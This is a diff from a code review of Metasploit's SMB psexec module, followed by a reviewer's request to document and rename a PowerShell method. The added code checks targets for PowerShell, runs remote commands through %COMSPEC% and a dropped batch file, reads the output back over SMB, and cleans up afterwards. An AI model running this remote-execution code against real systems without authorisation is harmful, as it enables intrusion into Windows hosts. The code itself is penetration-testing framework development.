lib/msf/core/exploit/smb/client/psexec.rb

```diff
@@ -193,6 +196,227 @@ def psexec(command, disconnect=true)
+    when 'C$'
+      path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
+    else
+      path = psh_path
+    end
+
+    simple.connect(share)
+    vprint_status("Checking for #{path}")
+    if smb_file_exist?(path)
+      vprint_status('PowerShell found')
+      psh = true
+    else
+      vprint_status('PowerShell not found')
+      psh = false
+    end
+
+    simple.disconnect(share)
+    psh
+  end
+
+  def execute_command(text, bat, cmd)
+    # Try and execute the provided command
+    execute = "%COMSPEC% /C echo #{cmd} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
+    vprint_status("Executing the command...")
+    begin
+      return psexec(execute)
+    rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
+      print_error("Unable to execute specified command: #{e}")
+      return false
+    end
+  end
+
+  # Retrive output from command
+  def get_output(file, smb_share, r_ip)
+    print_status("Getting the command output...")
+    output = smb_read_file(smb_share, r_ip, file)
+    if output.nil?
+      print_error("Error getting command output. #{$!.class}. #{$!}.")
+      return
+    end
+    if output.empty?
+      print_status("Command finished with no output")
+      return
+    end
+
+  end
+
+  # check if our process is done using these files
+  def exclusive_access(*files, smb_share, r_ip)
+    begin
+      simple.connect("\\\\#{r_ip}\\#{smb_share}")
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
+      print_status("Unable to get handle: #{accesserror}")
+      return false
+    end
+    files.each do |file|
+      begin
+        print_status("checking if the file is unlocked")
+        fd = smb_open(file, 'rwo')
+        fd.close
+      rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
+        print_status("Unable to get handle: #{accesserror}")
+        return false
+      end
+      simple.disconnect("\\\\#{r_ip}\\#{smb_share}")
+    end
+    return true
+  end
+
+  def cleanup_after(*files, smb_share, r_ip)
+    begin
+      simple.connect("\\\\#{r_ip}\\#{smb_share}")
+    rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
+      print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", "
+)} from the target.")
+      return
+    end
+    print_status("Executing cleanup...")
+    files.each do |file|
+      begin
+        smb_file_rm(file)
+      rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
+        print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
+      end
+    end
+    left = files.collect{ |f| smb_file_exist?(f) }
+    if left.any?
+      print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
+    else
+      print_good("Cleanup was successful")
+    end
+  end
 
+    def powershell
```

Comment:
This method needs documentation, it looks like it should be renamed something like `execute_powershell_payload()`.